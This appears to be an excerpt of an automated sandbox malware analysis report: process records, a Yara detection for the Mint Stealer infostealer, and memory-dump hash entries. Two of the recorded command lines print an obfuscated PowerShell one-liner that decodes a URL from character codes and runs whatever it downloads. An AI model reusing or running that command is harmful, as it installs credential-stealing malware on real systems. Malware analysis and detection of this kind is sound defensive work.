                                                                                                                              Start time:10:32:11
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:17
                                                                                                                              Start time:10:32:11
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437267233.00007FFD34510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34510000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd34510000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ddb1e7099755bfedc76519fb3c5d961eb856c48034956faa40d65854b0dd0531
                                                                                                                                • Instruction ID: 35d060a7062ede43406b8fa5e230c2d45c41ebf5f4d465fd6b320e2c576f3458
                                                                                                                                • Opcode Fuzzy Hash: ddb1e7099755bfedc76519fb3c5d961eb856c48034956faa40d65854b0dd0531
                                                                                                                                • Instruction Fuzzy Hash: 9BE1B330E08A4D8FDF99DF5CC495AA97BE1FF59310F1441AAD449D7296CA28EC82CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5633ac9f0dcd185b3b687e33ccb8b77ffbbb1b0168bec01cdf5e39a581b9da25
                                                                                                                                • Instruction ID: bc72b417b03ddc92660689e210070e270584908f3d22e47e13b60aa9f8474070
                                                                                                                                • Opcode Fuzzy Hash: 5633ac9f0dcd185b3b687e33ccb8b77ffbbb1b0168bec01cdf5e39a581b9da25
                                                                                                                                • Instruction Fuzzy Hash: 91D10772E0DA880FE766DA6888A56F67FD1EF47310F1801BFD18DC7193D919A846D341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f8301b630c2471db5b4467a7b2432bf98a713484326e2c19c31a4e7f9687696c
                                                                                                                                • Instruction ID: 3160b84ca3c97de2e76d727d0311703709235243bc25a91a22a77955f89dcd30
                                                                                                                                • Opcode Fuzzy Hash: f8301b630c2471db5b4467a7b2432bf98a713484326e2c19c31a4e7f9687696c
                                                                                                                                • Instruction Fuzzy Hash: 7C318F23E0EBD60FE7A3967458A51957FE1AF57210B0D00FBC588CB1E3E85D5C8A8356
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 250db0758109bd757db12b4be98c79e38e063517224cf89e2fd308e2c09c45a2
                                                                                                                                • Instruction ID: 023231040d5e260faaec667a781c813938a4a69c1eb1dfe4ec2e60a9764f4ae0
                                                                                                                                • Opcode Fuzzy Hash: 250db0758109bd757db12b4be98c79e38e063517224cf89e2fd308e2c09c45a2
                                                                                                                                • Instruction Fuzzy Hash: B7110A32F0DA884FEBD2DF9C44A45A97BE2EF5A310B1801BED54CD7193DE28A841C351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437267233.00007FFD34510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34510000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd34510000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 521195f6eba1550b0c87165e4f7b2e1ac971ce002f812ce5ee8d5842f7abb866
                                                                                                                                • Instruction ID: f8ca579f96c538a8284b5e374382e3afaa9865ed0b862b8421a5d7b80f24b1f5
                                                                                                                                • Opcode Fuzzy Hash: 521195f6eba1550b0c87165e4f7b2e1ac971ce002f812ce5ee8d5842f7abb866
                                                                                                                                • Instruction Fuzzy Hash: 7D01A73020CB0C4FDB44EF0CE091AA9B3E0FB85324F10052DE58AC36A1D636E881CB42
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ec499d304613af7eeb63ed86bfa69e438b00e0a6ba9dd1c29c735fe98a27d407
                                                                                                                                • Instruction ID: 5986e7b135c11751aee108d9abd8e34720eabcded6fc7ebc1235b1c6d9b44553
                                                                                                                                • Opcode Fuzzy Hash: ec499d304613af7eeb63ed86bfa69e438b00e0a6ba9dd1c29c735fe98a27d407
                                                                                                                                • Instruction Fuzzy Hash: 08E0D853B0FE894FD691AE5C2414169B7E1EB8A25131845FBE04DCB2D7DC1D5C494304
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 539fe76cdb9cc3f59b011513959d2eb65f043477a92765c9c0659343ae98e93e
                                                                                                                                • Instruction ID: 7d2c967da24ec835dad103482dd42a61d243a71d3b36cab57fddd18b93c1acc5
                                                                                                                                • Opcode Fuzzy Hash: 539fe76cdb9cc3f59b011513959d2eb65f043477a92765c9c0659343ae98e93e
                                                                                                                                • Instruction Fuzzy Hash: 44121731A08A4D8FDB94EF5CC4A5AA97BE1FF69310F1501B9D44DD72A6CA78EC42C780
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bad9798df7076c50beaa0a826992b48dd48eddb2aac498d7fcb87ab996b0261e
                                                                                                                                • Instruction ID: cc5938c7239626e3ca27225ba645683f17f7a80dbb9b3921e035e72cbe113014
                                                                                                                                • Opcode Fuzzy Hash: bad9798df7076c50beaa0a826992b48dd48eddb2aac498d7fcb87ab996b0261e
                                                                                                                                • Instruction Fuzzy Hash: 7391F472E0DA895FE766DB6888A56B53BE1EF43310F0801BEE08DC71A3D929AC45C751
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 882d720723d40695a9d9a29c0b276a1bb7512363687d7a1a19155b61463bf847
                                                                                                                                • Instruction ID: bc2fca7da1f98b83ace03c825e39fdeb2895ae3f8ae4b919fed02481621eadc2
                                                                                                                                • Opcode Fuzzy Hash: 882d720723d40695a9d9a29c0b276a1bb7512363687d7a1a19155b61463bf847
                                                                                                                                • Instruction Fuzzy Hash: D5319163E4EBC60FE7979AB449A5058BFE1EF5762074A00FBC148CB0A3E91D5C499312
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ec560d6cb88a31dce96051aee3e2011363e89565a3ffc897a33df44a3b6d7a1c
                                                                                                                                • Instruction ID: e0ace073738f167f7cdee44aacf69b08250479112150a0505b1862641f76af0c
                                                                                                                                • Opcode Fuzzy Hash: ec560d6cb88a31dce96051aee3e2011363e89565a3ffc897a33df44a3b6d7a1c
                                                                                                                                • Instruction Fuzzy Hash: CB11E732F0DA884FEB92DE9844A55A97BD1EF56310B1401BEC54DE7193DA29AC41C351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 827ffc17c68b4394729c7d3db2028b5df0b9573fb2b38fd978749fd0e3804eba
                                                                                                                                • Instruction ID: a5c11c42cceb97d398a95e0c01fd2a3b0f036c92ec5647340fb3fee6ba62b4a3
                                                                                                                                • Opcode Fuzzy Hash: 827ffc17c68b4394729c7d3db2028b5df0b9573fb2b38fd978749fd0e3804eba
                                                                                                                                • Instruction Fuzzy Hash: B401A73120CB0C4FD744EF4CE091AA5B3E0FB95324F10052DE58AC36A5DA36E881CB41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 55a23f08e02b9b94fa7fd1c4c6148d5f03dcd9ee39b73ce3c71f4b21ba1c9d27
                                                                                                                                • Instruction ID: 017812ea1b146417f2e51f6dc816baa95c4940454945add482c04d6ce65d9766
                                                                                                                                • Opcode Fuzzy Hash: 55a23f08e02b9b94fa7fd1c4c6148d5f03dcd9ee39b73ce3c71f4b21ba1c9d27
                                                                                                                                • Instruction Fuzzy Hash: CDE0D813B0FEC94FD6916F5C245416477E0EB8A25131445FBE04DCB1D3DC1D4C084304
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: N_^
                                                                                                                                • API String ID: 0-3769343188
                                                                                                                                • Opcode ID: d589691c702ae9720ad2e86f62ef435185e99fc364017f348a25d38adf3af588
                                                                                                                                • Instruction ID: 2f8e7620ef1049da0e2e055fbc1e221343412e09d67fe06f09bd57eb5d57d03c
                                                                                                                                • Opcode Fuzzy Hash: d589691c702ae9720ad2e86f62ef435185e99fc364017f348a25d38adf3af588
                                                                                                                                • Instruction Fuzzy Hash: E2719857F0D6E61BF3A2567C28F61E52F90DF531A670A00B7C784CE0D7AD5C68066392
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c964c5c8bb761c1e4504e3de2ce1799f4b544dea48dcbd10b654676265737deb
                                                                                                                                • Instruction ID: aacd66a68ff9dff0a1828c4ee810b226f7c4d9a67101c8a396ab5f5f646fa306
                                                                                                                                • Opcode Fuzzy Hash: c964c5c8bb761c1e4504e3de2ce1799f4b544dea48dcbd10b654676265737deb
                                                                                                                                • Instruction Fuzzy Hash: 59023A32B08A494FEB94DF1CC4A5AE97BE0FF56310F15017AC449C729ADE68AC42D781
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 57529ac3ae77b9db8429a7ded0521f9de8876915f6fc913f64d1ad84f61406a6
                                                                                                                                • Instruction ID: 6b7c1e03b75780a642027bbedf731e48b2639fbf8bf2d98f6c8d4a6037f10f5a
                                                                                                                                • Opcode Fuzzy Hash: 57529ac3ae77b9db8429a7ded0521f9de8876915f6fc913f64d1ad84f61406a6
                                                                                                                                • Instruction Fuzzy Hash: 6F91A467B0D7D21BE7229B6CA8F15D63F90FF8322570A00B3C6C4CE097AD5D284B9261
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e6629b9e5dbc047aa849a2bc9a8ab30a4510e6550af6e45b9fc7d6b797bb1827
                                                                                                                                • Instruction ID: 6937ed6c060821834ba23531fc0df859f18e7e714edac9025eb44a6286275af8
                                                                                                                                • Opcode Fuzzy Hash: e6629b9e5dbc047aa849a2bc9a8ab30a4510e6550af6e45b9fc7d6b797bb1827
                                                                                                                                • Instruction Fuzzy Hash: 3B519A57B0D7821FF752563898BA1DB3BE4FF9322470B10B7C684CA097ED5E2C069662